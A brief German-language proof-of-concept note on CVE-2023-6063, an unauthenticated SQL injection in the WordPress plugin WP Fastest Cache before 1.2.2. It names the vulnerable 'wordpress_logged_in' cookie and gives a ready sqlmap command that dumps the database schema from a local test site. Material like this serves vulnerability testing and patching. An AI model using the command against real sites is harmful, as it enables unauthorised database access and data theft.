
CVE-2023-6063 (WP Fastest Cache < 1.2.2 - Unauthentifizierte SQL-Injection)
Aktivieren Sie "WP Fastest Cache".

Der Cookie-Parameter "wordpress_logged_in" ist anfällig.
$ python sqlmap.py --dbms=mysql -u "http://127.0.0.1/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --schema
